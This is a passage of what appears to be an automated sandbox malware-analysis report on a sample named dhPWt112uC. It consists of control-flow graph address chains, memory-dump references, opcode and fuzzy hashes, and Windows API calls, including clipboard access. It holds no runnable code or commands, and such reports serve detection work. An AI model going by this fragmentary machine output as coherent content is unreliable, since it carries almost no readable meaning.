79 6f9af24 75->79 80 6f9af26-6f9af28 75->80 90 6f9af4b-6f9af51 76->90 91 6f9af61-6f9af72 76->91 84 6f9b145-6f9b220 call 6f96688 77->84 85 6f9b226-6f9b23b 77->85 78->77 79->76 80->76 84->85 85->45 93 6f9af53 90->93 94 6f9af55-6f9af57 90->94 97 6f9af8a-6f9afbb 91->97 98 6f9af74-6f9af7a 91->98 93->91 94->91 97->48 99 6f9af7c 98->99 100 6f9af7e-6f9af80 98->100 99->97 100->97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: e48a6daf41d1b1d10879e4291c2e2ad5c40759d6251fa221b8d1602a60d0d4c6
                                                                                                            • Instruction ID: 9c8cb1870ba4d5604540309a2e1043c05a276bdf49a963ee018dc88434d535ce
                                                                                                            • Opcode Fuzzy Hash: e48a6daf41d1b1d10879e4291c2e2ad5c40759d6251fa221b8d1602a60d0d4c6
                                                                                                            • Instruction Fuzzy Hash: 22E15E70E102098FEF69DF69E5806AEB7B2FF89704F108529D409AB354DB35DC46CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 255 6f9b728-6f9b74a 256 6f9b74c-6f9b74f 255->256 257 6f9b751-6f9b753 256->257 258 6f9b756-6f9b759 256->258 257->258 259 6f9b75b-6f9b7b8 call 6f96688 258->259 260 6f9b7bd-6f9b7c0 258->260 259->260 261 6f9b7c2-6f9b7c6 260->261 262 6f9b7e7-6f9b7ea 260->262 263 6f9b7cc-6f9b7dc 261->263 264 6f9bac3-6f9bafe 261->264 266 6f9b7fa-6f9b7fd 262->266 267 6f9b7ec-6f9b7f5 262->267 284 6f9b8cb-6f9b8ce 263->284 285 6f9b7e2 263->285 278 6f9bb00-6f9bb03 264->278 269 6f9b89a-6f9b8a3 266->269 270 6f9b803-6f9b806 266->270 267->266 273 6f9b8a9 269->273 274 6f9ba82-6f9ba8b 269->274 271 6f9b808-6f9b80c 270->271 272 6f9b81d-6f9b820 270->272 271->264 279 6f9b812-6f9b818 271->279 280 6f9b833-6f9b836 272->280 281 6f9b822-6f9b82e 272->281 283 6f9b8ae-6f9b8b1 273->283 274->264 282 6f9ba8d-6f9ba94 274->282 286 6f9bb05-6f9bb21 278->286 287 6f9bb26-6f9bb29 278->287 279->272 288 6f9b838-6f9b83f 280->288 289 6f9b84a-6f9b84d 280->289 281->280 290 6f9ba99-6f9ba9c 282->290 283->284 291 6f9b8b3-6f9b8b6 283->291 292 6f9b8d3-6f9b8d6 284->292 285->262 286->287 295 6f9bb2f-6f9bb57 287->295 296 6f9bd95-6f9bd97 287->296 297 6f9b8f2-6f9b8fb 288->297 298 6f9b845 288->298 301 6f9b85f-6f9b862 289->301 302 6f9b84f 289->302 299 6f9ba9e-6f9baa1 290->299 300 6f9baa6-6f9baa8 290->300 303 6f9b8b8-6f9b8c1 291->303 304 6f9b8c6-6f9b8c9 291->304 305 6f9b8d8-6f9b8dc 292->305 306 6f9b8ed-6f9b8f0 292->306 347 6f9bb59-6f9bb5c 295->347 348 6f9bb61-6f9bba5 295->348 307 6f9bd99 296->307 308 6f9bd9e-6f9bda1 296->308 312 6f9b900-6f9b903 297->312 298->289 299->300 309 6f9baaa 300->309 310 6f9baaf-6f9bab2 300->310 314 6f9b86f-6f9b872 301->314 315 6f9b864-6f9b86a 301->315 324 6f9b857-6f9b85a 302->324 303->304 304->284 304->292 305->264 311 6f9b8e2-6f9b8e8 305->311 306->297 306->312 307->308 308->278 321 6f9bda7-6f9bdb0 308->321 309->310 310->256 323 6f9bab8-6f9bac2 310->323 311->306 319 6f9b92a-6f9b92d 312->319 320 6f9b905-6f9b909 312->320 317 6f9b895-6f9b898 314->317 318 6f9b874-6f9b878 314->318 315->314 317->269 317->283 318->264 325 6f9b87e-6f9b88e 318->325 329 6f9b92f-6f9b932 319->329 330 6f9b944-6f9b947 319->330 320->264 327 6f9b90f-6f9b91f 320->327 324->301 325->320 341 6f9b890 325->341 327->261 342 6f9b925 327->342 329->264 331 6f9b938-6f9b93f 329->331 330->284 333 6f9b949-6f9b94c 330->333 331->330 337 6f9b96f-6f9b972 333->337 338 6f9b94e-6f9b96a 333->338 339 6f9b982-6f9b985 337->339 340 6f9b974-6f9b97d 337->340 338->337 344 6f9b98d-6f9b990 339->344 345 6f9b987-6f9b988 339->345 340->339 341->317 342->319 350 6f9b992-6f9b996 344->350 351 6f9b9a7-6f9b9aa 344->351 345->344 347->321 368 6f9bbab-6f9bbb4 348->368 369 6f9bd8a-6f9bd94 348->369 350->264 354 6f9b99c-6f9b9a2 350->354 355 6f9b9ac-6f9b9b1 351->355 356 6f9b9b4-6f9b9b7 351->356 354->351 355->356 357 6f9b9b9-6f9b9bc 356->357 358 6f9b9c7-6f9b9ca 356->358 357->329 360 6f9b9c2 357->360 361 6f9b9ec-6f9b9ef 358->361 362 6f9b9cc-6f9b9e7 358->362 360->358 361->284 363 6f9b9f5-6f9b9f8 361->363 362->361 366 6f9b9fa-6f9ba0f 363->366 367 6f9ba37-6f9ba3a 363->367 366->264 377 6f9ba15-6f9ba32 366->377 370 6f9ba3c-6f9ba51 367->370 371 6f9ba74-6f9ba77 367->371 373 6f9bbba-6f9bc26 call 6f96688 368->373 374 6f9bd80-6f9bd85 368->374 370->264 379 6f9ba53-6f9ba6f 370->379 371->357 372 6f9ba7d-6f9ba80 371->372 372->274 372->290 389 6f9bc2c-6f9bc31 373->389 390 6f9bd20-6f9bd35 373->390 374->369 377->367 379->371 391 6f9bc4d 389->391 392 6f9bc33-6f9bc39 389->392 390->374 396 6f9bc4f-6f9bc55 391->396 394 6f9bc3b-6f9bc3d 392->394 395 6f9bc3f-6f9bc41 392->395 397 6f9bc4b 394->397 395->397 398 6f9bc6a-6f9bc77 396->398 399 6f9bc57-6f9bc5d 396->399 397->396 406 6f9bc79-6f9bc7f 398->406 407 6f9bc8f-6f9bc9c 398->407 400 6f9bd0b-6f9bd1a 399->400 401 6f9bc63 399->401 400->389 400->390 401->398 402 6f9bc9e-6f9bcab 401->402 403 6f9bcd2-6f9bcdf 401->403 415 6f9bcad-6f9bcb3 402->415 416 6f9bcc3-6f9bcd0 402->416 412 6f9bce1-6f9bce7 403->412 413 6f9bcf7-6f9bd04 403->413 408 6f9bc81 406->408 409 6f9bc83-6f9bc85 406->409 407->400 408->407 409->407 419 6f9bce9 412->419 420 6f9bceb-6f9bced 412->420 413->400 417 6f9bcb5 415->417 418 6f9bcb7-6f9bcb9 415->418 416->400 417->416 418->416 419->413 420->413
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 26836d5affc9b8c5a02ceae5e90442ce099ac8f36318c0c7ec5278bc060972c4
                                                                                                            • Instruction ID: 74c01b4bef92a9c680cffe84808196cdf1f812137ee9fe409c95513df17d6aa6
                                                                                                            • Opcode Fuzzy Hash: 26836d5affc9b8c5a02ceae5e90442ce099ac8f36318c0c7ec5278bc060972c4
                                                                                                            • Instruction Fuzzy Hash: 14025C30E1020A8FEFA4CF68E4846AEB7B2FB45714F14896AD405DB355DB35DC86CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 423 6f8a247-6f8a249 424 6f8a24b-6f8a262 423->424 425 6f8a2ae-6f8a317 GetCurrentProcess 423->425 428 6f8a265-6f8a270 424->428 433 6f8a319-6f8a31f 425->433 434 6f8a320-6f8a354 GetCurrentThread 425->434 432 6f8a272-6f8a280 428->432 435 6f8a289-6f8a2ab 432->435 436 6f8a282-6f8a288 432->436 433->434 437 6f8a35d-6f8a391 GetCurrentProcess 434->437 438 6f8a356-6f8a35c 434->438 435->425 436->435 441 6f8a39a-6f8a3b5 call 6f8a458 437->441 442 6f8a393-6f8a399 437->442 438->437 445 6f8a3bb-6f8a3ea GetCurrentThreadId 441->445 442->441 446 6f8a3ec-6f8a3f2 445->446 447 6f8a3f3-6f8a455 445->447 446->447
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F8A306
                                                                                                            • GetCurrentThread.KERNEL32 ref: 06F8A343
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F8A380
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06F8A3D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 8c01a8c7b596a2a98573a3c4a9cf0d44886c5fd60b135a80a84df4ac3d9e4271
                                                                                                            • Instruction ID: 82d62da0065cff2a1e7dbc3a8cc5594855cfc93bf105349fe637cfc9db487bdd
                                                                                                            • Opcode Fuzzy Hash: 8c01a8c7b596a2a98573a3c4a9cf0d44886c5fd60b135a80a84df4ac3d9e4271
                                                                                                            • Instruction Fuzzy Hash: 296199B09013498FDB50DFA9D9487DEBFF1EF49304F24809AE049A7260DB745884CB66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 454 6f8a288-6f8a317 GetCurrentProcess 460 6f8a319-6f8a31f 454->460 461 6f8a320-6f8a354 GetCurrentThread 454->461 460->461 462 6f8a35d-6f8a391 GetCurrentProcess 461->462 463 6f8a356-6f8a35c 461->463 465 6f8a39a-6f8a3b5 call 6f8a458 462->465 466 6f8a393-6f8a399 462->466 463->462 469 6f8a3bb-6f8a3ea GetCurrentThreadId 465->469 466->465 470 6f8a3ec-6f8a3f2 469->470 471 6f8a3f3-6f8a455 469->471 470->471
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F8A306
                                                                                                            • GetCurrentThread.KERNEL32 ref: 06F8A343
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 06F8A380
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06F8A3D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: c42f2047207fb8d428b0b7b0d91cdc82db5a2bf98e0cdb3d0507624265ed6125
                                                                                                            • Instruction ID: e4164170f5978f11b905e9c1daa792104fb8c6634cd5f9fb741b0fae4c465c35
                                                                                                            • Opcode Fuzzy Hash: c42f2047207fb8d428b0b7b0d91cdc82db5a2bf98e0cdb3d0507624265ed6125
                                                                                                            • Instruction Fuzzy Hash: CE5146B0D002098FDB44DFAAD948B9EBBF1EF48304F24805AE059A7360DB759984CF66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 478 6f99230-6f99255 479 6f99257-6f9925a 478->479 480 6f99b18-6f99b1b 479->480 481 6f99260-6f99275 479->481 482 6f99b1d-6f99b3c 480->482 483 6f99b41-6f99b43 480->483 488 6f9928d-6f992a3 481->488 489 6f99277-6f9927d 481->489 482->483 485 6f99b4a-6f99b4d 483->485 486 6f99b45 483->486 485->479 490 6f99b53-6f99b5d 485->490 486->485 495 6f992ae-6f992b0 488->495 491 6f9927f 489->491 492 6f99281-6f99283 489->492 491->488 492->488 496 6f992c8-6f99339 495->496 497 6f992b2-6f992b8 495->497 508 6f9933b-6f9935e 496->508 509 6f99365-6f99381 496->509 498 6f992ba 497->498 499 6f992bc-6f992be 497->499 498->496 499->496 508->509 514 6f993ad-6f993c8 509->514 515 6f99383-6f993a6 509->515 520 6f993ca-6f993ec 514->520 521 6f993f3-6f9940e 514->521 515->514 520->521 526 6f99410-6f9942c 521->526 527 6f99433-6f99441 521->527 526->527 528 6f99451-6f994cb 527->528 529 6f99443-6f9944c 527->529 535 6f99518-6f9952d 528->535 536 6f994cd-6f994eb 528->536 529->490 535->480 540 6f994ed-6f994fc 536->540 541 6f99507-6f99516 536->541 540->541 541->535 541->536
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 37958879be97169609bf3257e4a136ecd3c40bc9e3d0be02ca9d5985c0535a1b
                                                                                                            • Instruction ID: b763adda2e1808887cc32fe33b689cc86e5e1daf0da70beb37d139a7851c682f
                                                                                                            • Opcode Fuzzy Hash: 37958879be97169609bf3257e4a136ecd3c40bc9e3d0be02ca9d5985c0535a1b
                                                                                                            • Instruction Fuzzy Hash: 11915B30F0021A9FEF54DF65D8907AEB3F6EF88604F148469D40AEB384EB749D468B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 544 6f9d030-6f9d04b 545 6f9d04d-6f9d050 544->545 546 6f9d099-6f9d09c 545->546 547 6f9d052-6f9d094 545->547 548 6f9d09e-6f9d0e0 546->548 549 6f9d0e5-6f9d0e8 546->549 547->546 548->549 550 6f9d0ea-6f9d0ec 549->550 551 6f9d0f7-6f9d0fa 549->551 553 6f9d519 550->553 554 6f9d0f2 550->554 555 6f9d0fc-6f9d10b 551->555 556 6f9d143-6f9d146 551->556 558 6f9d51c-6f9d528 553->558 554->551 559 6f9d11a-6f9d126 555->559 560 6f9d10d-6f9d112 555->560 561 6f9d148-6f9d18a 556->561 562 6f9d18f-6f9d192 556->562 558->555 564 6f9d52e-6f9d81b 558->564 565 6f9da4d-6f9da86 559->565 566 6f9d12c-6f9d13e 559->566 560->559 561->562 567 6f9d19c-6f9d19f 562->567 568 6f9d194-6f9d199 562->568 757 6f9d821-6f9d827 564->757 758 6f9da42-6f9da4c 564->758 584 6f9da88-6f9da8b 565->584 566->556 570 6f9d1ae-6f9d1b1 567->570 571 6f9d1a1-6f9d1a3 567->571 568->567 570->558 580 6f9d1b7-6f9d1ba 570->580 577 6f9d1a9 571->577 578 6f9d3d7-6f9d3e0 571->578 577->570 581 6f9d3ef-6f9d3fb 578->581 582 6f9d3e2-6f9d3e7 578->582 585 6f9d1dd-6f9d1e0 580->585 586 6f9d1bc-6f9d1d8 580->586 588 6f9d50c-6f9d511 581->588 589 6f9d401-6f9d415 581->589 582->581 592 6f9da8d-6f9dab9 584->592 593 6f9dabe-6f9dac1 584->593 590 6f9d229-6f9d22c 585->590 591 6f9d1e2-6f9d224 585->591 586->585 588->553 589->553 620 6f9d41b-6f9d42d 589->620 600 6f9d22e-6f9d270 590->600 601 6f9d275-6f9d278 590->601 591->590 592->593 598 6f9dad0-6f9dad3 593->598 599 6f9dac3 call 6f9dba5 593->599 607 6f9dad5-6f9daf1 598->607 608 6f9daf6-6f9daf8 598->608 615 6f9dac9-6f9dacb 599->615 600->601 609 6f9d27a-6f9d2bc 601->609 610 6f9d2c1-6f9d2c4 601->610 607->608 617 6f9dafa 608->617 618 6f9daff-6f9db02 608->618 609->610 613 6f9d2e1-6f9d2e4 610->613 614 6f9d2c6-6f9d2dc 610->614 623 6f9d32d-6f9d330 613->623 624 6f9d2e6-6f9d328 613->624 614->613 615->598 617->618 618->584 626 6f9db04-6f9db13 618->626 641 6f9d42f-6f9d435 620->641 642 6f9d451-6f9d453 620->642 632 6f9d379-6f9d37c 623->632 633 6f9d332-6f9d374 623->633 624->623 650 6f9db7a-6f9db8f 626->650 651 6f9db15-6f9db78 call 6f96688 626->651 634 6f9d37e-6f9d38d 632->634 635 6f9d3c5-6f9d3c7 632->635 633->632 644 6f9d39c-6f9d3a8 634->644 645 6f9d38f-6f9d394 634->645 647 6f9d3c9 635->647 648 6f9d3ce-6f9d3d1 635->648 652 6f9d439-6f9d445 641->652 653 6f9d437 641->653 656 6f9d45d-6f9d469 642->656 644->565 658 6f9d3ae-6f9d3c0 644->658 645->644 647->648 648->545 648->578 670 6f9db90 650->670 651->650 662 6f9d447-6f9d44f 652->662 653->662 676 6f9d46b-6f9d475 656->676 677 6f9d477 656->677 658->635 662->656 670->670 682 6f9d47c-6f9d47e 676->682 677->682 682->553 686 6f9d484-6f9d4a0 call 6f96688 682->686 697 6f9d4af-6f9d4bb 686->697 698 6f9d4a2-6f9d4a7 686->698 697->588 701 6f9d4bd-6f9d50a 697->701 698->697 701->553 759 6f9d829-6f9d82e 757->759 760 6f9d836-6f9d83f 757->760 759->760 760->565 761 6f9d845-6f9d858 760->761 763 6f9d85e-6f9d864 761->763 764 6f9da32-6f9da3c 761->764 765 6f9d873-6f9d87c 763->765 766 6f9d866-6f9d86b 763->766 764->757 764->758 765->565 767 6f9d882-6f9d8a3 765->767 766->765 770 6f9d8b2-6f9d8bb 767->770 771 6f9d8a5-6f9d8aa 767->771 770->565 772 6f9d8c1-6f9d8de 770->772 771->770 772->764 775 6f9d8e4-6f9d8ea 772->775 775->565 776 6f9d8f0-6f9d909 775->776 778 6f9d90f-6f9d936 776->778 779 6f9da25-6f9da2c 776->779 778->565 782 6f9d93c-6f9d946 778->782 779->764 779->775 782->565 783 6f9d94c-6f9d963 782->783 785 6f9d972-6f9d98d 783->785 786 6f9d965-6f9d970 783->786 785->779 791 6f9d993-6f9d9ac call 6f96688 785->791 786->785 795 6f9d9bb-6f9d9c4 791->795 796 6f9d9ae-6f9d9b3 791->796 795->565 797 6f9d9ca-6f9da1e 795->797 796->795 797->779
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 560d2bb50b5b7ec471e17ad9f9dd30c347fe2ad19a5fc80fb7dbdf25a2664cc5
                                                                                                            • Instruction ID: c25f35a968bfab430b6e1300052cfae21e01572bfd2be353b4415665395176e5
                                                                                                            • Opcode Fuzzy Hash: 560d2bb50b5b7ec471e17ad9f9dd30c347fe2ad19a5fc80fb7dbdf25a2664cc5
                                                                                                            • Instruction Fuzzy Hash: FD626130A006068FDF55DF68E580A5EB7B6FF84304F209A69D0099F369DB75EC4ACB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 805 6f94c70-6f94c94 806 6f94c96-6f94c99 805->806 807 6f94c9b-6f94cb5 806->807 808 6f94cba-6f94cbd 806->808 807->808 809 6f9539c-6f9539e 808->809 810 6f94cc3-6f94dbb 808->810 811 6f953a0 809->811 812 6f953a5-6f953a8 809->812 828 6f94e3e-6f94e45 810->828 829 6f94dc1-6f94e0e call 6f95519 810->829 811->812 812->806 814 6f953ae-6f953bb 812->814 830 6f94ec9-6f94ed2 828->830 831 6f94e4b-6f94ebb 828->831 842 6f94e14-6f94e30 829->842 830->814 848 6f94ebd 831->848 849 6f94ec6 831->849 845 6f94e3b 842->845 846 6f94e32 842->846 845->828 846->845 848->849 849->830
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: 4f5f15d280ca8ddd0ae4698324072e92c7263b7593a1b8faca6512fa21aa331b
                                                                                                            • Instruction ID: 2a31490a2775aa9c520570bfe1da0bac3475f4dd382862364a192fb29f5a2766
                                                                                                            • Opcode Fuzzy Hash: 4f5f15d280ca8ddd0ae4698324072e92c7263b7593a1b8faca6512fa21aa331b
                                                                                                            • Instruction Fuzzy Hash: F1616E70E002199FEF54DFA5C8547AEBBF6FB98700F20842AD10AAB395DB758C458B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1244 6f99220-6f99255 1246 6f99257-6f9925a 1244->1246 1247 6f99b18-6f99b1b 1246->1247 1248 6f99260-6f99275 1246->1248 1249 6f99b1d-6f99b3c 1247->1249 1250 6f99b41-6f99b43 1247->1250 1255 6f9928d-6f992a3 1248->1255 1256 6f99277-6f9927d 1248->1256 1249->1250 1252 6f99b4a-6f99b4d 1250->1252 1253 6f99b45 1250->1253 1252->1246 1257 6f99b53-6f99b5d 1252->1257 1253->1252 1262 6f992ae-6f992b0 1255->1262 1258 6f9927f 1256->1258 1259 6f99281-6f99283 1256->1259 1258->1255 1259->1255 1263 6f992c8-6f99339 1262->1263 1264 6f992b2-6f992b8 1262->1264 1275 6f9933b-6f9935e 1263->1275 1276 6f99365-6f99381 1263->1276 1265 6f992ba 1264->1265 1266 6f992bc-6f992be 1264->1266 1265->1263 1266->1263 1275->1276 1281 6f993ad-6f993c8 1276->1281 1282 6f99383-6f993a6 1276->1282 1287 6f993ca-6f993ec 1281->1287 1288 6f993f3-6f9940e 1281->1288 1282->1281 1287->1288 1293 6f99410-6f9942c 1288->1293 1294 6f99433-6f99441 1288->1294 1293->1294 1295 6f99451-6f994cb 1294->1295 1296 6f99443-6f9944c 1294->1296 1302 6f99518-6f9952d 1295->1302 1303 6f994cd-6f994eb 1295->1303 1296->1257 1302->1247 1307 6f994ed-6f994fc 1303->1307 1308 6f99507-6f99516 1303->1308 1307->1308 1308->1302 1308->1303
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 453bd6ad68ded409d0cf8c81c145183b67523e246db92693aaf26d4f57210a52
                                                                                                            • Instruction ID: 95eebbe9154a0d2ecd56cae0eb49ff44225b4d47c7450c29ff2811c28ddad009
                                                                                                            • Opcode Fuzzy Hash: 453bd6ad68ded409d0cf8c81c145183b67523e246db92693aaf26d4f57210a52
                                                                                                            • Instruction Fuzzy Hash: 20512E31B001059FEF54DB75D990BAEB3F6EB88654F148469D80AEB384EB74DC428BA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 0cfa0db20d7c2f5e93a17762f98da20e6b4c9c642729ecf2c71e225395ad6ad7
                                                                                                            • Instruction ID: 717f96d7521ff55d4b2553997191897b611463d8a457e823e5691eb588621a3b
                                                                                                            • Opcode Fuzzy Hash: 0cfa0db20d7c2f5e93a17762f98da20e6b4c9c642729ecf2c71e225395ad6ad7
                                                                                                            • Instruction Fuzzy Hash: 4A515170F002199FEB55DFA5C4547AEBBF6FF88700F208529D105AB395DB758C068B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8b584ab297202d704a324fab0d562509bc64a04e0e9bea4f2923ee6c11806d15
                                                                                                            • Instruction ID: 4c5ddaf0da1a581376b3bfffe216d45abe8e9c034495df7156522b87171da7aa
                                                                                                            • Opcode Fuzzy Hash: 8b584ab297202d704a324fab0d562509bc64a04e0e9bea4f2923ee6c11806d15
                                                                                                            • Instruction Fuzzy Hash: 0B5100319047988FCB14CBB9D8102AABBF5EF89210F1985ABE445E7291DB349845CBA1
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F8684A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 9a9f90272e86aa804aa2e5f2a23a6b86f1f28110ad940ac05d8b69d11831eb9b
                                                                                                            • Instruction ID: f709fcc328e758abb278cc0239b3ea6ca545648a2bf58015b9595bdfee9b9619
                                                                                                            • Opcode Fuzzy Hash: 9a9f90272e86aa804aa2e5f2a23a6b86f1f28110ad940ac05d8b69d11831eb9b
                                                                                                            • Instruction Fuzzy Hash: 5151CEB5D00309DFDB14DFA9D984ADEBBB5BF48310F24862AE819AB210D7709985CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F8684A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: f5f3f17f7470dce91f97c23a332c486bc38fdf69e8efdce22e4b1da1bc695941
                                                                                                            • Instruction ID: 61f3615873bf7d41cf599a6e01118dcf7bdf37c15b908934c9d5227c2186ab1e
                                                                                                            • Opcode Fuzzy Hash: f5f3f17f7470dce91f97c23a332c486bc38fdf69e8efdce22e4b1da1bc695941
                                                                                                            • Instruction Fuzzy Hash: 7F41B1B1D00309DFDB14DF99C884ADEBBB5BF48310F24812AE819AB210D7719885CF91
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F8B839
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 845f8f9edbf1e87f882d300deecbf7c4b93960248b62a2e931eee99afc73cc4f
                                                                                                            • Instruction ID: 23b0dcc5f495ce7e7399bda8c8052a32a258f7d3f57d7445941ae5042c9619e1
                                                                                                            • Opcode Fuzzy Hash: 845f8f9edbf1e87f882d300deecbf7c4b93960248b62a2e931eee99afc73cc4f
                                                                                                            • Instruction Fuzzy Hash: CD4129B9900305CFDB54DF99C888AAABBF5FF88314F24C499D519AB321D735A841CFA0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
